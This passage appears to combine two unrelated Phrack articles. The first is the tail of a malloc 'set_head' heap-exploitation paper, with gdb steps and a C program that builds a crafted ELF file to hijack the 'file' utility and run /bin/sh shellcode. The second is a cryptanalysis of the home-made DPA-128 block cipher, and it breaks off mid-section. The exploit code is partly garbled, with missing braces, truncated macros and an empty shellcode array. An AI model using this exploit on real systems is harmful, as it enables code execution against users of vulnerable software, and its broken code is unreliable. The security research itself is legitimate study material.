0x8061538:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061548:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061558:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061568:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061578:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061588:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061598:      0x90909090      0x90909090      0x90909090      0x90909090
0x80615a8:      0x90909090      0x90909090      0x90909090      0x90909090
0x80615b8:      0x90909090      0x90909090

0x8061558 is a valid address.

5- To get the return location for your exploit, get a saved EIP from a
stack frame.

(gdb) frame 3
#3  0x4001f32e in file_tryelf (ms=0x804bc90, fd=3, buf=0x0, nbytes=8192) at
1007                            if (doshn(ms, class, swap, fd,
(gdb) x $ebp+4
0xbffff7fc:     0x400172b3

0xbffff7fc is the return location.

6- You can now call the exploit with the values that you have found.

bash# ./new 0xbffff7fc 0x8061558 0x80614f8 mal
--[ Using 0x80614f8 as the top chunk location.
--[ Using 0xbffff7fc as the return location.
--[ Impossible to use 0x8061558 as the return address. Using 0x8061559
--[ The file has been written
bash# file mal


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>

#define DEBUG                           0

#define initial_ELF_garbage             75
//ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically
// linked

#define initial_netbsd_garbage          22
//, NetBSD-style, from '

#define post_netbsd_garbage             12
//' (signal 0)

// The following #define are from malloc.c and are used
// to compute the values for the malloc size and the top chunk size.
#define PREV_INUSE 0x1
#define SIZE_SZ (sizeof(size_t))
#define MIN_CHUNK_SIZE 16
#define MINSIZE (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \
#define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \

// Offsets of the note entries in the file
#define OFFSET_31_BYTES  2048
#define OFFSET_N_BYTES   2304
#define OFFSET_0_BYTES   2560

/* linux_ia32_exec -  CMD=/bin/sh Size=68 Encoder=PexFnstenvSub */
unsigned char scode[] =

struct math {
    int nnetbsd;
    int nname;

struct sethead {
    unsigned long topchunk_size;
    unsigned long malloc_size;

// To be a little more independent, we ripped
// the following ELF structures from elf.h
typedef struct
    unsigned char e_ident[16];
    uint16_t e_type;
    uint16_t e_machine;
    uint32_t e_version;
    uint32_t e_entry;
    uint32_t e_phoff;
    uint32_t e_shoff;
    uint32_t e_flags;
    uint16_t e_ehsize;
    uint16_t e_phentsize;
    uint16_t e_phnum;
    uint16_t e_shentsize;
    uint16_t e_shnum;
    uint16_t e_shstrndx;
} Elf32_Ehdr;

typedef struct
    uint32_t sh_name;
    uint32_t sh_type;
    uint32_t sh_flags;
    uint32_t sh_addr;
    uint32_t sh_offset;
    uint32_t sh_size;
    uint32_t sh_link;
    uint32_t sh_info;
    uint32_t sh_addralign;
    uint32_t sh_entsize;
} Elf32_Shdr;

typedef struct
    uint32_t n_namesz;
    uint32_t n_descsz;
    uint32_t n_type;
} Elf32_Nhdr;

struct sethead * set_head_compute
    (unsigned long retloc, unsigned long retadr, unsigned long toploc) {

    unsigned long check_retloc, check_retadr;
    struct sethead *shead;

    shead = (struct sethead *) malloc (8);
    if (shead == NULL) {
        fprintf (stderr,
            "--[ Could not allocate memory for sethead structure\n");
        exit (1);

    if ( (toploc % 8) != 0 ) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the top chunk location.",

        toploc = toploc - (toploc % 8);
        fprintf (stderr, "  Using 0x%x instead\n", toploc);
    } else
        fprintf (stderr,
            "--[ Using 0x%x as the top chunk location.\n", toploc);

    // The minus 8 is to take care of the normalization
    // of the malloc parameter
    shead->malloc_size = (retloc - toploc - 8);

    // By adding the 8, we are able to sometimes perfectly hit
    // the return address.  To hit it perfectly, retadr must be a multiple
    // of 8 + 1 (for the PREV_INUSE flag).
    shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE;

    if (shead->topchunk_size < shead->malloc_size) {
        fprintf (stderr,
            "--[ ERROR: topchunk size is less than malloc size.\n");
        fprintf (stderr, "--[ Topchunk code will not be triggered\n");
        exit (1);

    check_retloc = (toploc + request2size (shead->malloc_size) + 4);
    if (check_retloc != retloc) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the return location. ", retloc);
        fprintf (stderr, "Using 0x%x instead\n", check_retloc);
    } else
        fprintf (stderr, "--[ Using 0x%x as the return location.\n",

    check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS))
        - request2size (shead->malloc_size)) | PREV_INUSE;
    if (check_retadr != retadr) {
        fprintf (stderr,
            "--[ Impossible to use 0x%x as the return address.", retadr);
        fprintf (stderr, " Using 0x%x instead\n", check_retadr);
    } else
        fprintf (stderr, "--[ Using 0x%x as the return address.\n",

    return shead;

Not CPU friendly :)
struct math *
compute (int offset) {

    int accumulator = 0;
    int i, j;
    struct math *math;

    math = (struct math *) malloc (8);

    if (math == NULL) {
        printf ("--[ Could not allocate memory for math structure\n");
        exit (1);

    for (i = 1; i < 100;i++) {

        for (j = 0; j < (i * 31); j++) {

            accumulator = 0;
            accumulator += initial_ELF_garbage;
            accumulator += (i * (initial_netbsd_garbage +
            accumulator += initial_netbsd_garbage;

            accumulator += j;

            if (accumulator == offset) {
                math->nnetbsd = i;
                math->nname = j;

                return math;

    // Failed to find a value
    return 0;

put_byte (char *ptr, unsigned char data) {
    *ptr = data;

put_longword (char *ptr, unsigned long data) {
    put_byte (ptr, data);
    put_byte (ptr + 1, data >> 8);
    put_byte (ptr + 2, data >> 16);
    put_byte (ptr + 3, data >> 24);

open_file (char *filename) {

    FILE *fp;

    fp = fopen ( filename , "w" );

    if (!fp) {
        perror ("Cant open file");
        exit (1);

    return fp;

usage (char *progname) {

    printf ("\nTo use:\n");
    printf ("%s <return location> <return address> ", progname);
    printf ("<topchunk location> <output filename>\n\n");

    exit (1);

main (int argc, char *argv[]) {

    FILE *fp;
    Elf32_Ehdr *elfhdr;
    Elf32_Shdr *elfshdr;
    Elf32_Nhdr *elfnhdr;
    char *filename;
    char *buffer, *ptr;
    int i;
    struct math *math;
    struct sethead *shead;
    int left_bytes;
    unsigned long retloc, retadr, toploc;
    unsigned long topchunk_size, malloc_size;

    if ( argc != 5) {
        usage ( argv[0] );

    sscanf (argv[1], "0x%x", &retloc);
    sscanf (argv[2], "0x%x", &retadr);
    sscanf (argv[3], "0x%x", &toploc);

    filename = (char *) malloc (256);
    if (filename == NULL) {
        printf ("--[ Cannot allocate memory for filename...\n");
        exit (1);
    strncpy (filename, argv[4], 255);

    buffer = (char *) malloc (8192);
    if (buffer == NULL) {
        printf ("--[ Cannot allocate memory for file buffer\n");
        exit (1);
    memset (buffer, 0, 8192);

    math = compute (1036);
    if (!math) {
        printf ("--[ Unable to compute a value\n");
        exit (1);

    shead = set_head_compute (retloc, retadr, toploc);
    topchunk_size = shead->topchunk_size;
    malloc_size = shead->malloc_size;

    ptr = buffer;
    elfhdr = (Elf32_Ehdr *) ptr;

    // Fill our ELF header
    elfhdr->e_type =            2;       // ET_EXEC
    elfhdr->e_machine =         3;       // EM_386
    elfhdr->e_version =         1;       // EV_CURRENT
    elfhdr->e_entry =           0;
    elfhdr->e_phoff =           0;
    elfhdr->e_shoff =           52;
    elfhdr->e_flags =           0;
    elfhdr->e_ehsize =          52;
    elfhdr->e_phentsize =       32;
    elfhdr->e_phnum =           0;
    elfhdr->e_shentsize =       40;
    elfhdr->e_shnum =           math->nnetbsd + 2;
    elfhdr->e_shstrndx =        0;

    ptr += elfhdr->e_ehsize;
    elfshdr = (Elf32_Shdr *) ptr;

    // This loop lets us eat an arbitrary number of bytes in ms->o.buf
    left_bytes = math->nname;
    for (i = 0; i < math->nnetbsd; i++) {
        elfshdr->sh_name        = 0;
        elfshdr->sh_type        = 7;   // SHT_NOTE
        elfshdr->sh_flags       = 0;
        elfshdr->sh_addr        = 0;
        elfshdr->sh_size        = 256;
        elfshdr->sh_link        = 0;
        elfshdr->sh_info        = 0;
        elfshdr->sh_addralign   = 0;
        elfshdr->sh_entsize     = 0;

        if (left_bytes > 31) {
            // filename == 31
            elfshdr->sh_offset = OFFSET_31_BYTES;
            left_bytes -= 31;
        } else if (left_bytes != 0) {
            // filename < 31 && != 0
            elfshdr->sh_offset = OFFSET_N_BYTES;
            left_bytes = 0;
        } else {
            // filename == 0
            elfshdr->sh_offset = OFFSET_0_BYTES;

        // The first section header will also let us load
        // the shellcode in memory :)
        // Indeed, by requesting a large memory block,
        // the topchunk will be splitted, and this memory region
        // will be left untouched until we need it.
        // We assume its name is 31 bytes long.
        if (i == 0) {
            elfshdr->sh_size = 4096;
            elfshdr->sh_offset = OFFSET_SHELLCODE;


    // This section header entry is for the data that will
    // overwrite the topchunk size pointer
    elfshdr->sh_name        = 0;
    elfshdr->sh_type        = 7;      // SHT_NOTE
    elfshdr->sh_flags       = 0;
    elfshdr->sh_addr        = 0;
    elfshdr->sh_offset      = OFFSET_OVERWRITE;
    elfshdr->sh_size        = 256;
    elfshdr->sh_link        = 0;
    elfshdr->sh_info        = 0;
    elfshdr->sh_addralign   = 0;
    elfshdr->sh_entsize     = 0;

    // This section header entry triggers the call to malloc
    // with a user supplied length.
    // It is a requirement for the set_head technique to work
    elfshdr->sh_name        = 0;
    elfshdr->sh_type        = 7;     // SHT_NOTE
    elfshdr->sh_flags       = 0;
    elfshdr->sh_addr        = 0;
    elfshdr->sh_offset      = OFFSET_N_BYTES;
    elfshdr->sh_size        = malloc_size;
    elfshdr->sh_link        = 0;
    elfshdr->sh_info        = 0;
    elfshdr->sh_addralign   = 0;
    elfshdr->sh_entsize     = 0;

    // This note entry lets us eat 31 bytes + overhead
    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_31_BYTES);
    elfnhdr->n_namesz       = 12;
    elfnhdr->n_descsz       = 12;
    elfnhdr->n_type         = 1;
    ptr = buffer + OFFSET_31_BYTES + 12;
    sprintf (ptr, "NetBSD-CORE");
    sprintf (buffer + OFFSET_31_BYTES + 24 + 0x7c,

    // This note entry lets us eat an arbitrary number of bytes + overhead
    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_N_BYTES);
    elfnhdr->n_namesz       = 12;
    elfnhdr->n_descsz       = 12;
    elfnhdr->n_type         = 1;
    ptr = buffer + OFFSET_N_BYTES + 12;
    sprintf (ptr, "NetBSD-CORE");
    for (i = 0; i < (math->nname % 31); i++)

    // This note entry lets us eat 0 bytes + overhead
    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_0_BYTES);
    elfnhdr->n_namesz       = 12;
    elfnhdr->n_descsz       = 12;
    elfnhdr->n_type         = 1;
    ptr = buffer + OFFSET_0_BYTES + 12;
    sprintf (ptr, "NetBSD-CORE");

    // This note entry lets us specify the value that will
    // overwrite the topchunk size
    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_OVERWRITE);
    elfnhdr->n_namesz       = 12;
    elfnhdr->n_descsz       = 12;
    elfnhdr->n_type         = 1;
    ptr = buffer + OFFSET_OVERWRITE + 12;
    sprintf (ptr, "NetBSD-CORE");
    // Put the new topchunk size 7 times in memory
    // The note entry program name is at a specific, odd offset (24+0x7c)?
    for (i = 0; i < 7; i++)
        put_longword (buffer + OFFSET_OVERWRITE + 24 + 0x7c + (i * 4),

    // This note entry lets us eat 31 bytes + overhead, but
    // its real purpose is to load the shellcode in memory.
    // We assume that its name is 31 bytes long.
    elfnhdr = (Elf32_Nhdr *) (buffer + OFFSET_SHELLCODE);
    elfnhdr->n_namesz       = 12;
    elfnhdr->n_descsz       = 12;
    elfnhdr->n_type         = 1;
    ptr = buffer + OFFSET_SHELLCODE + 12;
    sprintf (ptr, "NetBSD-CORE");
    sprintf (buffer + OFFSET_SHELLCODE + 24 + 0x7c,

    // Fill this memory region with our shellcode.
    // Remember to leave the note entry untouched ...
    memset (buffer + OFFSET_SHELLCODE + 256, 0x90, 4096-256);
    sprintf (buffer + 8191 - strlen (scode), scode);

    fp = open_file (filename);
    if (fwrite (buffer, 8192, 1, fp) != 0 ) {
        printf ("--[ The file has been written\n");
    } else {
        printf ("--[ Can not write to the file\n");
        exit (1);
    fclose (fp);

    free (shead);
    free (math);
    free (buffer);
    free (filename);

    return 0;

--[ 7 - Final words

That's all for the details of this technique; a lot has already been said
through this paper.  By looking at the complexity of the malloc code, there
are probably many other ways to take control of a process by corrupting the
malloc chunks.

Of course, this paper explains the technical details of set_head, but
personally, I think that all the exploitation techniques are ephemeral.
This is more true, especially recently, with all the low level security
controls that were added to the modern operating systems.  Beside having
great technical skills, I personally think it's important to develop your
mental skills and your creativity.  Try to improve your attitude when
solving a difficult problem.  Develop your perseverance and determination,
even though you may have failed at the same thing 20, 50 or 100 times in a

I would like to greet the following individuals: bond, dp, jinx,
Michael and nitr0gen.  There is more people that I forget. Thanks for the
help and the great conversations we had over the last few years.

--[ 8 - References

1. Solar Designer,

2. Anonymous,

3. Kaempf, Michel,

4. Phantasmal Phantasmagoria,

5. Phantasmal Phantasmagoria,

6. jp,

7. Guay-Leroux, Jean-Sebastien,

8. gera,

9. The Shellcoder's Handbook: Discovering and Exploiting Security Holes
(2004), Wiley


              _                                                _
            _/B\_                                            _/W\_
            (* *)             Phrack #64 file 10             (* *)
            | - |                                            | - |
            |   |          Cryptanalysis of DPA-128          |   |
            |   |                                            |   |
            |   |                  By SysK                   |   |
            |   |                                            |   |
            |   |              |   |

--[ Contents

1 - Introduction
2 - A short word about block ciphers
3 - Overview of block cipher cryptanalysis
4 - Veins' DPA-128
  4.1 - Bugs in the implementation
  4.2 - Weaknesses in the design
5 - Breaking the linearized version
6 - On the non linearity of addition modulo n in GF(2)
7 - Exploiting weak keys
  7.1 - Playing with a toy cipher
  7.2 - Generalization and expected complexity
  7.3 - Cardinality of |W
8 - Breaking DPA based unkeyed hash function
  8.1 - Introduction to hash functions
  8.2 - DPAsum() algorithm
  8.3 - Weaknesses in the design/implementation
  8.4 - A (2nd) preimage attack
9 - Conclusion
10 - Greetings
11 - Bibliography

--[ 1 - Introduction

While the cracking scene has grown with cryptology thanks to the evolution
of binary protection schemes, the hacking scene mostly hasn't. This fact
is greatly justified by the fact that there were globally no real need. 
Indeed it's well known that if a hacker needs to decrypt some files then 
he will hack into the box of its owner, backdoor the system and then use
it to steal the key. A cracker who needs to break a protection scheme will
not have the same approach: he will usually try to understand it fully in
order to find and exploit design and/or implementation flaws. 

Although the growing of the security industry those last years changed a 
little bit the situation regarding the hacking community, nowadays there 
are still too many people with weak knowledge of this science. What is 
disturbing is the broadcast of urban legends and other hoax by some
paranoids among them. For example, haven't you ever heard people claiming
that government agencies were able to break RSA or AES? A much more clever
question would have been: what does "break" mean? 

A good example of paranoid reaction can be found in M1lt0n's article
[FakeP63]. The author who is probably skilled in hacking promotes the use
of "home made cryptographic algorithms" instead of standardized ones such
as 3DES. The corresponding argument is that since most so-called security
experts lake coding skills then they aren't able to develop appropriate
tools for exotic ciphers. While I agree at least partially with him
regarding the coding abilities, I can't possibly agree with the main
thesis. Indeed if some public tools are sufficient to break a 3DES based
protection then it means that a design and/or an implementation mistake
was/were made since, according to the state of the art, 3DES is still
unbroken. The cryptosystem was weak from the beginning and using "home 
made cryptography" would only weaken it more. 

It is therefore extremely important to understand cryptography and to 
trust the standards. In a previous Phrack issue (Phrack 62), Veins exposed
to the hacking community a "home made" block cipher called DPA (Dynamic 
Polyalphabetic Algorithms) [DPA128]. In the following paper, we are going 
to analyze this cipher and demonstrate that it is not flawless - at least
from a cryptanalytic perspective - thus fitting perfectly with our talk.

--[ 2 - A short word about block ciphers

Let's quote a little bit the excellent HAC [MenVan]:

"A block cipher is a function which maps n-bit plaintext blocks to n-bit 
ciphertext blocks; n is called the blocklength. It may be viewed as a 
simple substitution cipher with large character size. The function is 
parametrized by a k-bit key K, taking values from a subset |K (the key 
space) of the set of all k-bit vectors Vk. It is generally assumed that
the key is chosen at random. Use of plaintext and ciphertext blocks of
equal size avoids data expansion." 

Pretty clear isn't it? :> So what's the purpose of such a cryptosystem? 
Obviously since we are dealing with encryption this class of algorithms
provides confidentiality. Its construction makes it particularly suitable
for applications such as large volumes encryption (files or HD for 
example). Used in special modes such as CBC (like in OpenSSL) then it can 
also provide stream encryption. For example, we use AES-CBC in the WPA2, 
SSL and SSH protocols.

Remark: When used in conjunction with other mechanisms, block ciphers can 
also provide services such as authentication or integrity (cf part 8 of 
the paper).

An important point is the understanding of the cryptology utility. While 
cryptography aims at designing best algorithms that is to say secure and 
fast, cryptanalysis allows the evaluation of the security of those 
algorithms. The more an algorithm is proved to have weaknesses, the less 
we should trust it.

--[ 3 - Overview of block cipher cryptanalysis

The cryptanalysis of block ciphers evolved significantly in the 90s with 
the apparition of some fundamental methods such as the differential 
[BiSha90] and the linear [Matsui92] cryptanalysis. In addition to some 
more recent ones like the boomerang attack of Wagner or the chi square 
cryptanalysis of Vaudenay [Vaud], they constitute the set of so-called
statistical attacks on block ciphers in opposition to the very recent and
still controverted algebraic ones (see [CourtAlg] for more information).

Today the evolution of block cipher cryptanalysis tends to stabilize 
itself. However a cryptographer still has to acquire quite a deep knowledge
of those attacks in order to design a cipher. Reading the Phrack paper, we 
think - actually we may be wrong - that the author mostly based his design 
on statistical tests. Although they are obviously necessary, they can't 
possibly be enough. Every component has to be carefully chosen. We 
identified several weaknesses and think that some more may still be left.

--[ 4 - Veins' DPA-128 description

DPA-128 is a 16 rounds block cipher providing 128 bits block encryption 
using an n bits key. Each round encryption is composed of 3 functions
which are rbytechain(), rbitshift() and S_E(). Thus for each input block,
we apply the E() function 16 times (one per round) :

void E (unsigned char *key, unsigned char *block, unsigned int shift)
    rbytechain (block);
    rbitshift (block, shift);
    S_E (key, block, shift);


- block is the 128b input
- shift is a 32b parameter dependent of the round subkey
- key is the 128b round subkey

Consequently, the mathematical description of this cipher is:
f: |P x |K ----> |C

    - |P is the set of all plaintexts
    - |K is the set of all keys
    - |C is the set of all ciphertexts

For p element of |P, k of |K and c of |C, we have c = f(p,k)
with f = EE...EE = E^16 and  meaning the composition of functions.

We are now going to describe each function. Since we sometimes may need
mathematics to do so, we will assume that the reader is familiar with
basic algebra ;>

rbytechain() is described by the following C function:

void rbytechain(unsigned char *block)
    int i;
    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] ^= block[(i + 1) % DPA_BLOCK_SIZE];

    - block is the 128b input
    - DPA_BLOCK_SIZE equals 16

Such an operation on bytes is called linear mixing and its goal is to 
provide the diffusion of information (according to the well known Shannon
theory). Mathematically, it's no more than a linear map between two GF(2) 
vector spaces of dimension 128. Indeed, if U and V are vectors over GF(2) 
representing respectively the input and the output of rbytechain() then 
V = M.U where M is a 128x128 matrix over GF(2) of the linear map where 
coefficients of the matrix are trivial to find. Now let's see rbitshift(). 
Its C version is:

void rbitshift(unsigned char *block, unsigned int shift)
    unsigned int i;
    unsigned int div;
    unsigned int mod;
    unsigned int rel;
    unsigned char mask;
    unsigned char remainder;
    unsigned char sblock[DPA_BLOCK_SIZE];
    if (shift)
        mask = 0;
        shift %= 128;
        div = shift / 8;
        mod = shift % 8;
        rel = DPA_BLOCK_SIZE - div;
        for (i = 0; i < mod; ++i)
            mask |= (1 << i);

        for (i = 0; i < DPA_BLOCK_SIZE; ++i)
            remainder =
            ((block[(rel + i - 1) % DPA_BLOCK_SIZE]) & mask) << (8 - mod);
            sblock[i] = 
	    ((block[(rel + i) % DPA_BLOCK_SIZE]) >> mod) | remainder;
     memcpy(block, sblock, DPA_BLOCK_SIZE);

    - block is the 128b input
    - DPA_BLOCK_SIZE equals 16
    - shift is derived from the round subkey

Veins describes it in his paper as a key-related shifting (in fact it has
to be a key-related 'rotation' since we intend to be able to decrypt the 
ciphertext ;)). A careful read of the code and several tests confirmed that
it was not erroneous (up to a bug detailed later in this paper), so we can 
describe it as a linear map between two GF(2) vector spaces of dimension 128. 

Indeed, if V and W are vectors over GF(2) representing respectively the 
input and the output of rbitshift() then:

W = M'.V where M' is the 128x128 matrix over GF(2) of the linear 
map where, unlike the previous function, coefficients of the matrix are 
unknown up to a probability of 1/128 per round.

Such a function also provides diffusion of information.

Finally, the last operation S_E() is described by the C code:

void S_E (unsigned char *key, unsigned char *block, unsigned int s)
    int i;
    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] = (key[i] + block[i] + s) % 256;

    - block is the 128b input
    - DPA_BLOCK_SIZE equals 16
    - s is the shift parameter described in the previous function
    - key is the round subkey

The main idea of veins' paper is the so-called "polyalphabetic substitution"
concept, whose implementation is supposed to be the S_E() C function. 
Reading the code, it appears to be no more than a key mixing function over 

Remark: We shall see later the importance of the mathematical operation
know as 'addition' over GF(2^8). Regarding the key scheduling, each cipher 
round makes use of a 128b subkey as well as of a 32b one deriving from it
called "shift". The following pseudo code describes this operation:

    skey(0) = checksum128(master_key)
    for i = 0, nbr_round-2:
        skey(i+1) = checksum128(skey(i))
    skey(0) = skey(15)
    for i = 0, nbr_round-1:
        shift(nbr_round-1 - i) = hash32(skey(i))

where skey(i) is the i'th subkey.

It is not necessary to explicit the checksum128() and hash32(), the reader
just has to remind this thing: whatever the weakness there may be in those
functions, we will now consider them being true oneway hash functions 
providing perfect entropy.

As a conclusion, the studied cipher is closed to being a SPN (Substitution
- Permutation Network) which is a very generic and well known construction 
(AES is one for example).

--[ 4.1 - Bugs in the implementation

Although veins himself honestly recognizes that the cipher may be weak and
"strongly discourages its use" to quote him [DPA128], some people could 
nevertheless decide to use it as a primitive for encryption of personal 
and/or sensitive data as an alternative to 'already-cracked-by-NSA' 
ciphers [NSA2007]. Unfortunately for those theoretical people, we were able
to identify a bug leading to a potentially incorrect functioning of the 
cryptosystem (with a non negligible probability). 

We saw earlier that the bitshift code skeleton was the following:

/* bitshift.c */
void {r,l}bitshift(unsigned char *block, unsigned int shift)
    [...] // SysK : local vars declaration
    unsigned char sblock[DPA_BLOCK_SIZE];
    if (shift)
        [...] // SysK : sblock initialization
    memcpy(block, sblock, DPA_BLOCK_SIZE);

Clearly, if 'shift' is 0 then 'block' is fed with stack content! Obviously
in such a case the cryptosystem can't possibly work. 

Since shift is an integer, such an event occurs with at least a theoretical
probability of 1/2^32 per round.

Now let's study the shift generation function:

/* hash32.c */
* This function computes a 32 bits output out a variable length input. It is
* not important to have a nice distribution and low collisions as it is used
* on the output of checksum128() (see checksum128.c). There is a requirement
* though, the function should not consider \0 as a key terminator.

unsigned long hash32(unsigned char *k, unsigned int length)
    unsigned long h;
    for (h = 0; *k && length; ++k, --length)
    h = 13 * h + *k;
    return (h);

As stated in the C code commentary, hash32() is the function which produces
the shift. Although the author is careful and admits that the output 
distribution may not be completely uniform (not exactly equal probability
for each byte value to appear) it is obvious that a strong bias is not
desirable (Cf 7.3). 

However what happens if the first byte pointed by k is 0 ? Since the loop
ends for k equal to 0, then h will be equal to 13 * 0 + 0 = 0. Assuming 
that the underlying subkey is truly random, such an event should occur with
a probability of 1/256 (instead of 1/2^32). Since the output of hash32() is
an integer as stated in the comment, this is clearly a bug. 

We could be tempted to think that this implementation failure leads to a 
weakness but a short look at the code tells us that:

struct s_dpa_sub_key {
    unsigned char key[DPA_KEY_SIZE];
    unsigned char shift;

typedef struct s_dpa_sub_key DPA_SUB_KEY;

Therefore since shift is a char object, the presence of "*k &&" in the code
doesn't change the fact that the cryptosystem will fail with a probability 
of 1/256 per round.

Since the bug may appear independently in each round, the probability of 
failure is even greater:

p("fail") = 1 - p("ok")
          = 1 - Mul( p("ok in round i") )
          = 1 - (255/256)^16
	  = 0.0607...

where i is element of [0, (nbr_rounds - 1)]
It's not too far from 1/16 :-)

Remark: We shall see later that the special case where shift is equal to 0 
is part of a general class of weak keys potentially allowing an attacker to 
break the cryptosystem.

Hunting weaknesses and bugs in the implementation of cryptographic 
primitives is the common job of some reverse engineers since it sometimes 
allows to break implementations of algorithms which are believed to be 
theoretically secure. While those flaws mostly concern asymmetric 
primitives of digital signature or key negotiation/generation, it can also
apply in some very specific cases to the block cipher world.

From now, we will consider the annoying bug in bitshift() fixed.

--[ 4.2 - Weaknesses in the design

When designing a block cipher, a cryptographer has to be very careful about
every details of the algorithm. In the following section, we describe 
several design mistakes and explain why in some cases, it can reduce the 
security of the cipher.

a) We saw earlier that the E() function was applied to each round. However 
such a construction is not perfect regarding the first round. Since 
rbytechain() is a linear mixing operating not involving key material, it 
shouldn't be used as the first operation on the input buffer since its 
effect on it can be completely canceled. Therefore, if a cryptanalyst wants
to attack the bitshift() component of the first round, he just have to 
apply lbytechain() (the rbytechain() inverse function) to the input vector.
It would thus have been a good idea to put a key mixing as the first 

b) The rbitshift() operation only need the 7 first bits of the shift 
character whereas the S_E() uses all of them. It is also generally 
considered a bad idea to use the same key material for several operations.

c) If for some reason, the attacker is able to leak the second (not the 
first) subkey then it implies the compromising of all the key material. Of
course the master key will remain unknown because of the onewayness of 
checksum128() however we do not need to recover it in order to encrypt
and/or decrypt datas.

d) In the bitshift() function, a loop is particularly interesting:

for (i = 0; i < mod; ++i)
    mask |= (1 << i);

What is interesting is that the time execution of the loop is dependent of
"mod" which is derived from the shift. Therefore we conclude that this loop
probably allows a side channel attack against the cipher. Thanks to X for 
having pointed this out ;> In the computer security area, it's well known 
that a single tiny mistake can lead to the total compromising of an 
information system. In cryptography, the same rules apply.

--[ 5 - Breaking the linearized version

Even if we regret the non justification of addition operation employment,
it is not the worst choice in itself. What would have happen if the key 
mixing had been done with a xor operation over GF(2^8) instead as it is the
case in DES or AES for example?

To measure the importance of algebraic consideration in the security of a 
block cipher, let's play a little bit with a linearized version of the 
cipher. That is to say that we replace the S_E() function with the 
following S_E2() where :

void S_E2 (unsigned char *key, unsigned char *block, unsigned int s)
    int i;
    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] = (key[i] ^ block[i] ^ s) % 256; [1] 
	// + is replaced by xor

If X, Y and K are vectors over GF(2^8) representing respectively the input,
the output of S_E2() and the round key material then Y = X xor K.

Remark: K = sK xor shift. We use K for simplification purpose.

Now considering the full round we have :

V = M.U         [a] (rbytechain)
W = M'.V        [b] (rbitshift)
Y = W xor K     [c] (S_E2)

Linear algebra allows the composition of applications rbytechain() and 
rbitshift() since the dimensions of M and M' match but W in [b] is a vector
over GF(2) whereas W in [c] is clearly over GF(2^8). However, due to the 
use of XOR in [c], Y, W and K can also be seen as vectors over GF(2). 
Therefore, S_E2() is a GF(2) affine map between two vector spaces of
dimension 128.

We then have:

Y = M'.M.U xor K

The use of differential cryptanalysis will help us to get rid of the key. 
Let's consider couples (U0,Y0 = E(U0)) and (U1,Y1 = E(U1)) then:

DELTA(Y) = Y0 xor Y1
         = (M'.M.U0 xor K) xor (M'.M.U1 xor K)
         = (M'.M.U0 xor M'.M.U1) xor K xor K     (commutativity & 
	                                          associativity of xor)
         = (M'.M).(U0 xor U1)                     (distributivity)
         = (M'.M).DELTA(U)

Such a result shows us that whatever sK and shift are, there is always a
linear map linking an input differential to the corresponding output 

The generalization to the 16 rounds using matrix multiplication is obvious. 
Therefore we have proved that there exists a 128x128 matrix Mf over GF(2) 
such as DELTA(Y) = Mf.DELTA(X) for the linearized version of the cipher.

Then assuming we know one couple (U0,Y0) and Mf, we can encrypt any input U.
Indeed, Y xor Y0 = Mf.(U xor U0) therefore Y = (Mf.(U xor U0)) xor Y0.

Remark 1: The attack doesn't give us the knowledge of subkeys and shifts 
but such a thing is useless. The goal of an attacker is not the key in 
itself but rather the ability of encrypting/decrypting a set of 
plaintexts/ciphertexts. Furthermore, considering the key scheduling 
operation, if we really needed to recover the master key, it would be quite
a pain in the ass considering the fact that checksum128() is a one way 
function ;-)

Remark 2: Obviously in order to decrypt any output Y we need to calculate 
Mf^-1 which is the inverse matrix of Mf. This is somewhat more interesting
isn't it ? :-)

Because of rbitshift(), we are unable to determine using matrix 
multiplications the coefficients of Mf. An exhaustive search is of course 
impossible because of the huge complexity (2^16384) however, finding them 
is equivalent to solving 128 systems (1 system per row of Mf) of 128 
variables (1 variable per column) in GF(2). To build such a system, we need
128 couples of (cleartext,ciphertext). The described attack was implemented
using the nice NTL library ([SHOUP]) and can be found in annexe A of this

$ g++ break_linear.cpp bitshift.o bytechain.o key.c hash32.o checksum128.o 
-o break_linear -lntl -lcrypto -I include
$ ./break_linear
[+] Generating the plaintexts / ciphertexts
[+] NTL stuff !
[+] Calculation of Mf
[+] Let's make a test !
[+] Well done boy :>

Remark: Sometimes NTL detects a linear relation between chosen inputs 
(DELTA_X) and will then refuse to work. Indeed, in order to solve the 128 
systems, we need a situation where every equations are independent. If it's
not the case, then obviously det(M) is equal to 0 (with probability 1/2). 
Since inputs are randomly generated, just try again until it works :-)

$ ./break_linear
[+] Generating the plaintexts / ciphertexts
[+] NTL stuff !
det(M) = 0

As a conclusion we saw that the linearity over GF(2) of the xor operation 
allowed us to write an affine relation between two elements of GF(2)^128 in
the S_E2() function and then to easily break the linearized version using a
128 known plaintext attack. The use of non linearity is crucial in the 
design. Fortunately for DPA-128, Veins chose the addition modulo 256 as the
key mixer which is naturally non linear over GF(2).

--[ 6 - On the non linearity of addition modulo n over GF(2)

The bitshift() and bytechain() functions can be described using matrix over 
GF(2) therefore it is interesting to use this field for algebraic 

The difference between addition and xor laws in GF(2^n) lies in the carry 

w(i) + k(i) = w(i) xor k(i) xor carry(i)
where w(i), k(i) and carry(i) are elements of GF(2). 

We note w(i) as the i'th bit of w and will keep this notation until the end. 
carry(i), written c(i) for simplification purpose, is defined recursively:

c(i+1) = w(i).k(i) xor w(i).c(i) xor k(i).c(i)
with c(0) = 0

Using this notation, it would thus be possible to determine a set of 
relations over GF(2) between input/output bits which the attacker controls
using a known plaintext attack and the subkey bits (which the attacker
tries to guess).

